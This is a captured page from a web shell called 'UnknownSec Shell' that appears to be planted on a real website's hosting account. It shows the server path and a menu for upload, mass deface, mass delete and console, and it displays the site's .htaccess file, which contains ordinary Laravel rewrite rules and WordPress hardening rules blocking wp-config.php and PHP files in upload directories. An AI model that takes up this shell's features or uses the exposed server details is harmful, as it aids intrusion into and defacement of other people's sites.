shell bypass 403

UnknownSec Shell

: /home/faydaca/public_html/public/ [ drwxr-xr-x ]
upload mass deface mass delete console info server

name : .htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
<IfModule mod_rewrite.c>
    <IfModule mod_negotiation.c>
        Options -MultiViews
    </IfModule>

    RewriteEngine On

    ##
    ## You may need to uncomment (remove #) the following line for some hosting environments,
    ## if you have installed to a subdirectory, enter the name here also.
    ## Example: for https://site.com enter: "/", for https://site.com/something enter: "/something/"
    ##
    # RewriteBase /

    # Redirect Trailing Slashes If Not A Folder...
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule ^(.*)/$ /$1 [L,R=301]

    # Handle Front Controller...
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteRule ^ index.php [L]

    # Handle Authorization Header
    RewriteCond %{HTTP:Authorization} .
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
</IfModule>

<IfModule mod_headers.c>
    <Files "ngsw-worker.js">
        Header Set Service-Worker-allowed "/"
    </Files>
</IfModule>

# php -- BEGIN cPanel-generated handler, do not edit
# php -- END cPanel-generated handler, do not edit

<IfModule Litespeed>
# Block access to readme.html and readme.txt files
RewriteCond %{REQUEST_URI} ^/readme\.html$ [NC,OR]
RewriteCond %{REQUEST_URI} ^/readme\.txt$ [NC]
RewriteRule .* - [F,L]

# Block access to xmlrpc.php, phpinfo.php and wp-trackback.php files
RewriteCond %{REQUEST_URI} ^/xmlrpc\.php$ [NC,OR]
RewriteCond %{REQUEST_URI} ^/phpinfo\.php$ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-trackback\.php$ [NC]
RewriteRule .* - [F,L]

# Block access to license.txt and wp-config.php files
RewriteCond %{REQUEST_URI} ^/license\.txt$ [NC,OR]
RewriteCond %{REQUEST_URI} ^/wp-config\.php$ [NC]
RewriteRule .* - [F,L]

# Block access to wp-admin/includes directory
RewriteRule ^/wp-admin/includes/ - [F,L]

# Block access to all files in wp-includes directory, except for .js files
RewriteCond %{REQUEST_URI} !^/wp-includes/.*\.js$ [NC]
RewriteRule ^/wp-includes/ - [F,L]

# Block access to all PHP files in wp-includes directory
RewriteRule ^/wp-includes/.*\.php$ - [F,L]

# Block access to PHP files in wp-includes/js/tinymce/langs directory
RewriteRule ^/wp-includes/js/tinymce/langs/.+\.php$ - [F,L]

# Block access to wp-includes/theme-compat directory
RewriteRule ^/wp-includes/theme-compat/ - [F,L]

# Block access to .git and .svn directories
RewriteRule (^|.*/)\.(git|svn)/.* - [F,L]

# Block access to PHP files in wp-content/uploads directory
RewriteRule ^/wp-content/uploads/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ [NC,F,L]

# Block access to PHP files in wp-content/plugins directory
RewriteRule ^/wp-content/plugins/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ [NC,F,L]

# Block access to PHP files in wp-content/themes directory
RewriteRule ^/wp-content/themes/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ [NC,F,L]
</IfModule>

© 2025 UnknownSec
SineGOV -Sinema Tutkunlarının Buluşma Noktası